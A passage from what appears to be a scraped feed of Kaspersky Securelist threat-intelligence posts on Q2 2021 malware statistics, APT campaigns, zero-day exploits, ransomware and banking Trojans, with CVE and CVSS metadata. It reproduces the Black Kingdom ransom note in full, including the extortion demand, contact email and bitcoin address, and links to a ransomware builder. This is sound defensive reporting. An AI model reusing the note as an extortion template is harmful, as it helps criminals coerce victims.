It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q2 2021, our File Anti-Virus detected **68,294,298** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Turkmenistan | 49.38 \n2 | Tajikistan | 48.11 \n3 | Afghanistan | 46.52 \n4 | Uzbekistan | 44.21 \n5 | Ethiopia | 43.69 \n6 | Yemen | 43.64 \n7 | Cuba | 38.71 \n8 | Myanmar | 36.12 \n9 | Syria | 35.87 \n10 | South Sudan | 35.22 \n11 | China | 35.14 \n12 | Kyrgyzstan | 34.91 \n13 | Bangladesh | 34.63 \n14 | Venezuela | 34.15 \n15 | Benin | 32.94 \n16 | Algeria | 32.83 \n17 | Iraq | 32.55 \n18 | Madagascar | 31.68 \n19 | Mauritania | 31.60 \n20 | Belarus | 31.38 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141906/15-en-malware-report-q2-2021-graphs-pc.png>))_\n\nOn average worldwide, **Malware-class** local 
threats were recorded on 15.56% of users' computers at least once during the quarter. Russia scored 17.52% in this rating.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-08-12T10:00:12", "type": "securelist", "title": "IT threat evolution in Q2 2021. PC statistics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802", "CVE-2020-1472", "CVE-2021-1675", "CVE-2021-21220", "CVE-2021-28310", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-31166", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-33742", "CVE-2021-34527"], "modified": "2021-08-12T10:00:12", "id": "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08", "href": "https://securelist.com/it-threat-evolution-in-q2-2021-pc-statistics/103607/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-12T10:37:29", "description": "\n\n## Targeted attacks\n\n### The leap of a Cycldek-related threat actor\n\nIt is quite common for Chinese-speaking threat actors to share tools and methodologies: 
one such example is the infamous "DLL side-loading triad": a legitimate executable, a malicious DLL to be [side-loaded](<https://attack.mitre.org/techniques/T1574/002/>) by it and an encoded payload, generally dropped from a self-extracting archive. This was first thought to be a signature of [LuckyMouse](<https://securelist.com/luckymouse-hits-national-data-center/86083/>), but we have observed other groups using similar "triads", including HoneyMyte. While it is not possible to attribute attacks based on this technique alone, efficient detection of such triads reveals more and more malicious activity.\n\nWe recently described one such file, called "FoundCore", which caught our attention because of the various improvements it brought to this well-known infection vector. We discovered the malware as part of an attack against a high-profile organization in Vietnam. From a high-level perspective, the infection chain follows the expected execution flow:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06085101/Cycldek_01.jpg>)\n\nHowever, in this case, the shellcode was heavily obfuscated \u2013 the technical details were presented in the '[The leap of a Cycldek-related threat actor](<https://securelist.com/the-leap-of-a-cycldek-related-threat-actor/101243/>)' report. We found the loader for this file so interesting that we decided to base one of the tracks of our [Targeted Malware Reverse Engineering](<https://xtraining.kaspersky.com/courses/targeted-malware-reverse-engineering>) course on it.\n\nThe final payload is a remote administration tool that provides full control over the victim machine to its operators. 
Communication with the server can take place either over raw TCP sockets encrypted with RC4, or via HTTPS.\n\nIn the vast majority of the incidents we discovered, FoundCore executions were preceded by the opening of malicious RTF documents downloaded from static.phongay[.]com \u2013 all generated using [RoyalRoad](<https://malpedia.caad.fkie.fraunhofer.de/details/win.8t_dropper>) and attempting to exploit CVE-2018-0802. All of these documents were blank, suggesting the existence of precursor documents \u2013 possibly delivered by means of spear-phishing or a previous infection \u2013 that trigger the download of the RTF files. Successful exploitation leads to the deployment of further malware \u2013 named DropPhone and CoreLoader.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06091732/Cycldek_06.jpg>)\n\nOur telemetry indicates that dozens of organizations were affected, belonging to the government or military sector, or otherwise related to the health, diplomacy, education or political verticals. Eighty percent of the targets were in Vietnam, though we also identified occasional targets in Central Asia and Thailand.\n\nWhile Cycldek has so far been considered one of the least sophisticated Chinese-speaking threat actors, its targeting is consistent with what we observed in this campaign \u2013 which is why we attribute the campaign, with low confidence, to this threat actor.\n\n### Zero-day vulnerability in Desktop Window Manager used in the wild\n\nWhile analyzing the [CVE-2021-1732](<https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/>) exploit, first discovered by DBAPPSecurity Threat Intelligence Center and used by the BITTER APT group, we found another zero-day exploit that we believe is linked to the same threat actor. 
We reported this new exploit to Microsoft in February and, after confirmation that it is indeed a zero-day, [Microsoft released a patch](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-28310>) for the new zero-day (CVE-2021-28310) as part of its April security updates.\n\nCVE-2021-28310 is an out-of-bounds (OOB) write vulnerability in dwmcore.dll, which is part of Desktop Window Manager (dwm.exe). Due to the lack of bounds checking, attackers are able to create a situation that allows them to write controlled data at a controlled offset using the DirectComposition API. [DirectComposition](<https://docs.microsoft.com/en-us/windows/win32/directcomp/directcomposition-portal>) is a Windows component that was introduced in Windows 8 to enable bitmap composition with transforms, effects and animations, with support for bitmaps of different sources (GDI, DirectX, etc.).\n\nThe exploit was initially identified by our advanced exploit prevention technology and related detection records. Over the past few years, we have built a multitude of exploit protection technologies into our products that have detected several zero-days, proving their effectiveness time and again.\n\nWe believe this exploit is used in the wild, potentially by several threat actors, and it is probably used together with other browser exploits to escape sandboxes or obtain system privileges for further access.\n\nYou can find technical details on the exploit in the '[Zero-day vulnerability in Desktop Window Manager (CVE-2021-28310) used in the wild](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>)' post. 
Further information about BITTER APT and IOCs are available to customers of the Kaspersky Intelligence Reporting service: contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n### Operation TunnelSnake\n\nWindows rootkits, especially those operating in kernel space, enjoy high privileges in the system, allowing them to intercept and potentially tamper with core I/O operations conducted by the underlying OS, like reading or writing to files or processing incoming and outgoing network packets. Their ability to blend into the fabric of the operating system itself is how rootkits have gained their notoriety for stealth and evasion.\n\nNevertheless, over the years, it has become more difficult to deploy and execute a rootkit component in Windows. The introduction by Microsoft of Driver Signature Enforcement and Kernel Patch Protection (PatchGuard) has made it harder to tamper with the system. As a result, the number of Windows rootkits in the wild has decreased dramatically: most of those that are still active are often used in high-profile APT attacks.\n\nOne such example came to our attention during an investigation last year, in which we uncovered a previously unknown and stealthy implant in the networks of regional inter-governmental organizations in Asia and Africa. This rootkit, which we dubbed "Moriya", was used to deploy passive backdoors on public facing servers, facilitating the creation of a covert C2 (Command and Control) communication channel through which they can be silently controlled.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/08151011/Operation_TunnelSnake_01.png>)\n\nThis tool was used as part of an ongoing campaign that we named "[TunnelSnake](<https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831/>)". 
The rootkit was detected on the targeted machines as early as November 2019; and another tool we found, showing significant code overlaps with the rootkit, suggests that the developers had been active since at least 2018.\n\nSince neither the rootkit nor other lateral movement tools that accompanied it during the campaign relied on hardcoded C2 servers, we could gain only partial visibility into the attacker's infrastructure. However, the bulk of the detected tools, besides Moriya, consists of both proprietary and well-known pieces of malware that were previously in use by Chinese-speaking threat actors, giving a clue to the attacker's origin.\n\n### PuzzleMaker\n\nOn April 14-15, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits.\n\nWhile we were not able to retrieve the exploit used for Remote Code Execution (RCE) in the Chrome web browser, we were able to find and analyze an Escalation of Privilege (EoP) exploit used to escape the sandbox and obtain system privileges. This EoP exploit was fine-tuned to work against the latest and most prominent builds of Windows 10 (17763 - RS5, 18362 - 19H1, 18363 - 19H2, 19041 - 20H1, 19042 - 20H2), and exploits two distinct vulnerabilities in the Microsoft Windows OS kernel.\n\nOn April 20, we reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the Information Disclosure vulnerability and CVE-2021-31956 to the EoP vulnerability. Both vulnerabilities were patched on June 8, as a part of the June Patch Tuesday.\n\nThe exploit chain attempts to install malware in the system through a dropper. 
The malware starts as a system service and loads the payload, a "remote shell"-style backdoor, which in turn connects to the C2 to get commands.\n\nWe weren't able to find any connections or overlaps with a known threat actor, so we tentatively named this cluster of activity [PuzzleMaker](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>).\n\n### Andariel adds ransomware to its toolset\n\nIn April, we discovered a suspicious Word document containing a Korean file name and decoy uploaded to VirusTotal. The document contained an unfamiliar macro and used novel techniques to implant the next payload. Our telemetry revealed two infection methods used in these attacks, with each payload having its own loader for execution in memory. The threat actor only delivered the final stage payload for selected victims.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/15094853/Andariel_delivered_ransomware_01.png>)\n\nDuring the course of our research, Malwarebytes published a [report](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/>) with technical details about the same series of attacks, which attributed it to the Lazarus group. However, after thorough analysis, we reached the conclusion that the attacks were the work of Andariel, a sub-group of Lazarus, based on code overlaps between the second stage payload in this campaign and previous malware from this threat actor.\n\nHistorically, Andariel has mainly targeted organizations in South Korea; and our telemetry suggests that this is also the case in this campaign. We confirmed several victims in the manufacturing, home network service, media and construction sectors.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/15095550/Andariel_delivered_ransomware_08.png>)\n\nWe also found additional connections with the Andariel group. 
Each threat actor has a characteristic habit when they interactively work with a backdoor shell in the post-exploitation phase of an attack. The way Windows commands and their options were used in this campaign is almost identical to previous Andariel activity.\n\nNotably, in addition to the final backdoor, we discovered one victim infected with custom ransomware, underlining the financial motivation of this threat actor.\n\n### Ferocious Kitten\n\n[Ferocious Kitten](<https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/>) is an APT threat actor that has targeted Persian-speaking individuals who appear to be based in Iran. The group has mostly operated under the radar and, as far as we know, has not been covered by security researchers. The threat actor attracted attention recently when a lure document was uploaded to VirusTotal and went public thanks to [researchers on Twitter](<https://twitter.com/reddrip7/status/1366703445990723585?s=21>). Since then, one of its implants [has been analyzed](<http://www.hackdig.com/03/hack-293629.htm>) by a Chinese threat intelligence firm.\n\nWe were able to expand on some of the findings about the group and provide insights into the additional variants that it uses. The malware dropped from the lure document, dubbed "MarkiRAT", records keystrokes, clipboard content, and provides file download and upload capabilities as well as the ability to execute arbitrary commands on the victim's computer. We were able to trace the implant back to at least 2015, along with variants intended to hijack the execution of Telegram and Chrome applications as a persistence method.\n\nFerocious Kitten is one of the groups that operate in a wider eco-system intended to track individuals in Iran. Such threat groups aren't reported very often, and are therefore able to re-use infrastructure and toolsets without worrying about them being taken down or flagged by security solutions. 
Some of the TTPs used by this threat actor are reminiscent of other groups that are active against a similar set of targets, such as Domestic Kitten and Rampant Kitten.\n\n## Other malware\n\n### Evolution of JSWorm ransomware\n\nWhile ransomware has been around for a long time, it has evolved over time as attackers have improved their technologies and refined their tactics. We have seen a shift away from the random, speculative attacks of five years ago, and even from the massive outbreaks such as [WannaCry](<https://securelist.com/wannacry-faq-what-you-need-to-know-today/78411/>) and [NotPetya](<https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/>). Many ransomware gangs have switched to the more profitable tactic of "big-game hunting"; and news of ransomware attacks affecting large corporations, and even critical infrastructure installations, has become commonplace. Moreover, there's now a [well-developed eco-system underpinning ransomware attacks](<https://securelist.com/ransomware-world-in-2021/102169/>).\n\nAs a result, even though [the number of ransomware attacks has fallen](<https://securelist.com/ransomware-by-the-numbers-reassessing-the-threats-global-impact/101965/>), and individuals are probably less likely to encounter ransomware than a few years ago, the threat to organizations is greater than ever.\n\nWe recently published analysis of one such ransomware family, named [JSWorm](<https://securelist.com/evolution-of-jsworm-ransomware/102428/>). This malware was discovered in 2019, and since then different variants have gained notoriety under various names such as Nemty, Nefilim, Offwhite and others.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24115814/JSworm_malware_01.png>)\n\nEach "re-branded" version has included alterations to different aspects of the code \u2013 file extensions, cryptographic schemes, encryption keys, programming language and distribution model. 
Since it emerged, JSWorm has developed from a typical mass-scale ransomware threat affecting mostly individual users into a typical big-game hunting ransomware threat attacking high-profile targets and demanding massive ransom payments.\n\n### Black Kingdom ransomware\n\n[Black Kingdom](<https://securelist.com/black-kingdom-ransomware/102873/>) first appeared in 2019; in 2020 the group was observed exploiting vulnerabilities (such as CVE-2019-11510) in its attacks. In recent activity, the ransomware was used by an unknown adversary for exploiting a Microsoft Exchange vulnerability (CVE-2021-27065, aka [ProxyLogon](<https://proxylogon.com/>)). This ransomware family is much less sophisticated than other [Ransomware-as-a-Service](<https://encyclopedia.kaspersky.com/glossary/ransomware-as-a-service-raas/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (RaaS) or big game hunting families. The group's involvement in the Microsoft Exchange exploitation campaign suggests opportunism rather than a resurgence in activity from this ransomware family.\n\nThe malware is coded in Python and compiled to an executable using PyInstaller. The ransomware supports two encryption modes: one generated dynamically and one using a hardcoded key. Code analysis revealed an amateurish development cycle and the possibility of recovering files that have been encrypted with Black Kingdom with the help of the hardcoded key. 
At the time of analysis, there was already a [script to recover files encrypted with the embedded key](<https://blog.cyberint.com/black-kingdom-ransomware>).\n\nBlack Kingdom changes the desktop background to a note that the system is infected while it encrypts files, disabling the mouse and keyboard as it does so.\n \n \n ***************************\n | We Are Back ?\n ***************************\n \n We hacked your (( Network )), and now all files, documents, images,\n databases and other important data are safely encrypted using the strongest algorithms ever.\n You cannot access any of your files or services .\n But do not worry. You can restore everthing and get back business very soon ( depends on your actions )\n \n before I tell how you can restore your data, you have to know certain things :\n \n We have downloaded most of your data ( especially important data ) , and if you don't contact us within 2 days, your data will be released to the public.\n \n To see what happens to those who didn't contact us, just google : ( Blackkingdom Ransomware )\n \n ***************************\n | What guarantees ?\n ***************************\n \n We understand your stress and anxiety. 
So you have a free opportunity to test our service by instantly decrypting one or two files for free\n just send the files you want to decrypt to (support_blackkingdom2@protonmail.com\n \n ***************************************************\n | How to contact us and recover all of your files ?\n ***************************************************\n \n The only way to recover your files and protect from data leaks, is to purchase a unique private key for you that we only posses .\n \n \n [ + ] Instructions:\n \n 1- Send the decrypt_file.txt file to the following email ===> support_blackkingdom2@protonmail.com\n \n 2- send the following amount of US dollars ( 10,000 ) worth of bitcoin to this address :\n \n [ 1Lf8ZzcEhhRiXpk6YNQFpCJcUisiXb34FT ]\n \n 3- confirm your payment by sending the transfer url to our email address\n \n 4- After you submit the payment, the data will be removed from our servers, and the decoder will be given to you,\n so that you can recover all your files.\n \n ## Note ##\n \n Dear system administrators, do not think you can handle it on your own. Notify your supervisors as soon as possible.\n By hiding the truth and not communicating with us, what happened will be published on social media and yet in news websites.\n \n Your ID ==>\n FDHJ91CUSzXTquLpqAnP\n\nAfter decompiling the Python code, we discovered that the code base for Black Kingdom has its origins in an open-source ransomware builder [available on GitHub](<https://github.com/BuchiDen/Ransomware_RAASNet/blob/master/RAASNet.py>). The group adapted parts of the code, adding features that were not originally present in the builder, such as the hardcoded key. 
We were not able to attribute Black Kingdom to any known threat group.\n\nBased on our telemetry, we could see only a few hits by Black Kingdom in Italy and Japan.\n\n### Gootkit: the cautious banking Trojan\n\n[Gootkit](<https://securelist.com/gootkit-the-cautious-trojan/102731/>) belongs to a class of Trojans that are extremely tenacious, but not widespread. Since it's not very common, new versions of the Trojan may remain under the researchers' radar for long periods.\n\nIt is a complex, multi-stage banking malware, which was initially discovered by Doctor Web in 2014. Initially, it was distributed via spam and exploit kits such as Spelevo and RIG. In conjunction with spam campaigns, the adversaries later switched to compromised websites where visitors are tricked into downloading the malware.\n\nGootkit is capable of stealing data from the browser, performing man-in-the-browser attacks, keylogging, taking screenshots, and lots of other malicious actions. The Trojan's loader performs various virtual machine and sandbox checks and uses sophisticated persistence algorithms.\n\nIn 2019, Gootkit stopped operating after it experienced a [data leak](<https://www.zdnet.com/article/gootkit-malware-crew-left-their-database-exposed-online-without-a-password/>), but has been [active again](<https://www.bleepingcomputer.com/news/security/gootkit-malware-returns-to-life-alongside-revil-ransomware/>) since November 2020. Most of the victims are located in EU countries such as Germany and Italy.\n\n### Bizarro banking Trojan expands into Europe\n\nBizarro is one more banking Trojan family originating from Brazil that is now found in other parts of the world. We have seen people being targeted in Spain, Portugal, France and Italy. 
This malware has been used to steal credentials from customers of 70 banks from different European and South American countries.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/14143631/Bizarro_trojan_13.png>)\n\nAs with [Tetrade](<https://securelist.com/the-tetrade-brazilian-banking-malware/97779/>), Bizarro uses affiliates or recruits money mules to cash out or simply to help with money transfers.\n\nBizarro is distributed via MSI packages downloaded by victims from links in spam emails. Once launched, it downloads a ZIP archive from a compromised website. We observed hacked WordPress, Amazon and Azure servers used by the Trojan for storing archives. The backdoor, which is the core component of Bizarro, contains more than 100 commands and allows the attackers to steal online banking account credentials. Most of the commands are used to display fake pop-up messages and seek to trick people into entering two-factor authentication codes. The Trojan may also use social engineering to convince victims to download a smartphone app.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/14143359/Bizarro_trojan_12.png>)\n\nBizarro is one of several banking Trojans from South America that have extended their operations into other regions \u2013 mainly Europe. They include Guildma, Javali, Melcoz, Grandoreiro and Amavaldo.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/17095011/Map_of_Brazilian_families.jpeg>)\n\n### Malicious code in APKPure app\n\nIn early April, we [discovered malicious code in version 3.17.18 of the official client of the APKPure app store](<https://securelist.com/apkpure-android-app-store-infected/101845/>), a popular alternative source of Android apps. 
[The incident seems to be similar to what happened with CamScanner](<https://www.kaspersky.com/blog/camscanner-malicious-android-app/28156/>), when the app's developer implemented an adware SDK from an unverified source.\n\nWhen launched, the embedded Trojan dropper, which our solutions detect as HEUR:Trojan-Dropper.AndroidOS.Triada.ap, unpacks and runs its payload, which is able to show ads on the lock screen, open browser tabs, collect information about the device, and download other malicious code. The Trojan downloaded depends on the version of Android and how recently security updates have been installed. In the case of relatively recent versions of the operating system (Android 8 or higher) it loads additional modules for the [Triada Trojan](<https://www.kaspersky.com/blog/triada-trojan/11481/>). If the device is older (Android 6 or 7, and without security updates installed) it could be the [xHelper Trojan](<https://securelist.com/unkillable-xhelper-and-a-trojan-matryoshka/96487/>).\n\nWe reported the issue to APKPure on April 8. APKPure acknowledged the problem the following day and, soon afterwards, posted a new version (3.17.19) that does not contain the malicious component.\n\n### Browser lockers\n\nBrowser lockers are designed to prevent the victim from using their browser unless they pay a ransom. The "locking" consists of preventing the victim from leaving the current tab, which displays intimidating messages, often with sound and visual effects. The locker tries to trick the victim into making a payment with threats of losing data or legal liability.\n\nThis type of fraud has long been on the radar of researchers, and over the last decade there have been numerous browser locking campaigns targeting people worldwide. 
The tricks used by the scammers include imitating the infamous "[Blue Screen of Death](<https://encyclopedia.kaspersky.com/glossary/blue-screen-of-death-bsod/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>)" (BSOD) in the browser, false warnings about system errors or detected malware, threats to encrypt files and legal liability notices.\n\nIn our [report on browser lockers](<https://securelist.com/browser-lockers-extortion-disguised-as-a-fine/101735/>), we examined two families of lockers that mimic government websites.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/01145253/MVD_fake_sites_07-scaled.jpeg>)\n\nBoth families spread mainly via advertising networks, primarily aimed at selling "adult" content and movies in an intrusive manner; for example, through tabs or windows that open on top of the visited site when loading a page with an embedded ad module (pop-ups), or after clicking anywhere on the page (click-unders).\n\nThese threats are not technically complex: they simply aim to create the illusion of having locked the computer and intimidate victims into paying money. Landing on such a page by mistake will not harm your device or compromise your data, as long as you don't fall for the cybercriminals' smoke-and-mirror tactics.\n\n### Malware targets Apple M1 chip\n\nLast November, Apple unveiled its M1 chip. The new chip, which has replaced Intel processors in several of its products, is based on ARM architecture instead of the x86 architecture traditionally used in personal computers. This lays the foundation for Apple to switch completely to its own processors and unify its software under a single architecture. 
Unfortunately, just months after the release, [malware writers had already adapted several malware families to the new processor](<https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/>).\n\n### Attempted supply-chain attack using PHP\n\nIn March, [unknown attackers tried to carry out a supply-chain attack by introducing malicious code to the PHP scripting language](<https://www.kaspersky.com/blog/php-git-backdor/39191/>). The developers of PHP make changes to the code using a common repository built on the Git version control system. The attackers tried to add a backdoor to the code. Fortunately, a developer noticed something suspicious during a routine check. Had they not done so, the backdoor might have allowed attackers to run malicious code remotely on web servers, around 80 per cent of which use PHP.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-08-12T10:00:37", "type": "securelist", "title": "IT threat evolution Q2 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0802", "CVE-2019-11510", "CVE-2021-1732", "CVE-2021-27065", "CVE-2021-28310", 
"CVE-2021-31955", "CVE-2021-31956"], "modified": "2021-08-12T10:00:37", "id": "SECURELIST:934E8AA177A27150B87EC15F920BF350", "href": "https://securelist.com/it-threat-evolution-q2-2021/103597/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-04T10:41:58", "description": "\n\nFor more than four years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q2 2021.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## The most remarkable findings\n\nInvestigating the recent Microsoft Exchange vulnerabilities we and our colleagues from AMR found an attacker deploying a previously unknown backdoor, "FourteenHi", in a campaign that we dubbed ExCone, active since mid-March. During our investigation we revealed multiple tools and variants of FourteenHi, configured with infrastructure that FireEye reported as being related to the UNC2643 activity cluster. Moreover, we saw ShadowPad detections coincide with FourteenHi variant infections, possibly hinting at a shared operator between these two malware families.\n\nFourteenHi abuses the popular VLC media player to execute its loader. It is capable of performing basic backdoor functions. 
Further investigation also revealed scripts used by the actor to gain situational awareness post-exploitation, as well as previous use of the infrastructure to operate Cobalt Strike Beacon.\n\nAlthough we couldn't directly attribute this activity to any known threat actor, we found older, highly similar 64-bit samples of the backdoor used in close proximity with ShadowPad malware, mostly known for its operations involving supply-chain attacks as an infection vector. Notably, we also found one C2 IP used in a 64-bit sample reportedly used in the UNC2643 activity set, associated with the HAFNIUM threat actor, also using Cobalt Strike, DLL side-loading and exploiting the same Exchange vulnerabilities.\n\n## Russian-speaking activity\n\nOn May 27 and 28, details regarding an ongoing email campaign against diplomatic entities throughout Europe and North America were released by Volexity and Microsoft. These attacks were attributed to Nobelium and APT29 by Microsoft and Volexity respectively. While we were able to verify the malware and possible targeting for this cluster of activity, we haven't been able to make a definitive assessment at this time about which threat actor is responsible, although we found ties to Kazuar. We have designated it as a new threat actor and named it "HotCousin". The attacks began with a spear-phishing email which led to an ISO file container being stored on disk and mounted. From here, the victim was presented with a LNK file made to look like a folder within an Explorer window. If the victim double clicked on it, the LNK then executed a loader written in .NET referred to as BoomBox, or a DLL. The execution chain ultimately ended with a Cobalt Strike beacon payload being loaded into memory. According to public blogs, targeting was widespread but focused primarily on diplomatic entities throughout Europe and North America: based on the content of the lure documents bundled with the malware, this assessment appears to be accurate. 
This cluster of activity was conducted methodically beginning in January with selective targeting and slow operational pace, then ramping up and ending in May. There are indications of previous activity from this threat actor dating back to at least October 2020, based on other Cobalt Strike payloads and loaders bearing similar toolmarks.\n\n## Chinese-speaking activity\n\nWhile investigating a recent rise of attacks against Exchange servers, we noticed a recurring cluster of activity that appeared in several distinct compromised networks. This cluster stood out because it used a formerly unknown Windows kernel mode rootkit and a sophisticated multi-stage malware framework aimed at providing remote control over the attacked servers. The former is used to hide the user mode malware's artefacts from investigators and security solutions, while demonstrating an interesting loading scheme involving the kernel mode component of an open source project named "Cheat Engine" to bypass the Windows Driver Signature Enforcement mechanism. We were able to determine that this toolset had been in use from as early as July 2020; and that the threat actor was mostly focused on Southeast Asian targets, including several governmental entities and telecoms companies. Since this was a long-standing operation, with high-profile victims, an advanced toolset and no affinity to a known threat actor, we decided to name the underlying cluster "GhostEmperor".\n\nAPT31 (aka ZIRCONIUM) is a Chinese-speaking intrusion set. This threat actor set up an ORB (Operational Relay Boxes) infrastructure, composed of several compromised SOHO routers, to target entities based in Europe (and perhaps elsewhere). As of the publication of our report in May, we had seen these ORBs used to relay Cobalt Strike communications and for anonymization proxying purposes. It is likely that APT31 uses them for other implants and ends as well (for example, exploit or malware staging). 
Most of the infrastructure put in place by APT31 comprises compromised Pakedge routers (RK1, RE1 and RE2). This little-known vendor specializes in small enterprise routers and network devices. So far, we don't know which specific vulnerability has been exploited by the intrusion set to compromise the routers. Nor do we currently possess telemetry that would provide further visibility into this campaign. We will, of course, continue to track these activities.\n\nFollowing our previous report on EdwardsPheasant, DomainTools and BitDefender published articles about malicious activities against targets in Southeast Asia which we believe, with medium to high confidence, are parts of EdwardsPheasant campaigns. While tracking the activities of this threat actor, analyzing samples discovered or provided by third parties, and investigating from public IoCs, we discovered an updated DropPhone implant, an additional implant loaded by FoundCore's shellcode, several possible new infection documents and malicious domain names, as well as additional targets. While we do not believe we have a complete picture of this set of activities yet, our report this quarter marks a significant step further in understanding its extent.\n\nA Chinese-speaking APT compromised a certificate authority in Mongolia and replaced digital certificate management client software with a malicious downloader in February. We are tracking this group as BountyGlad. Related infrastructure was identified and used in multiple other incidents: interesting related activity included server-side attacks on WebSphere and WebLogic services in Hong Kong; and on the client-side, Trojanized Flash Player installers. The group demonstrated an increase in strategic sophistication with this supply-chain attack. While replacing a legitimate installer on a high value website like a certificate authority requires a medium level of skill and coordination, the technical sophistication is not on par with ShadowHammer. 
And while the group deploys fairly interesting, but simplistic, steganography to cloak its shellcode, we think it was probably generated with code that has been publicly available for years. Previous activity also connected with this group relied heavily on spear-phishing and Cobalt Strike throughout 2020. Some activity involved PowerShell commands and loader variants different from the downloaders presented in our recent report. In addition to spear-phishing, the group appears to rely on publicly available exploits to penetrate unpatched target systems. They use implants and C2 (Command and Control) code that are a mix of both publicly available and privately shared across multiple Chinese-speaking APTs. We are able to connect infrastructure across multiple incidents. Some of those were focused on Western targets in 2020. Some of the infrastructure listed in an FBI Flash alert published in May 2020, targeting US organizations conducting COVID-19 research, was also used by BountyGlad.

